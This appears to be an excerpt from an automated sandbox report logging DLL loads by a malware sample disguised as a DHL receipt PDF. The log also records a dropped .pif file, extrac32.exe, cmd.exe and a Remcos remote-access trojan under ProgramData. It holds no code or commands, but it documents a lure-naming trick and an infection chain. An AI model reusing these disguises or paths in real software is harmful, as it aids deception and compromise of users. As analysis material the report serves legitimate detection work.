              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ?.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ?.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ???e???????????.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ???e???????????.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: winmm.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: wldp.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: propsys.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: profapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: edputil.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: slc.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: userenv.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: mpr.dllJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: archiveint.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: url.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: netapi32.dllJump to behavior
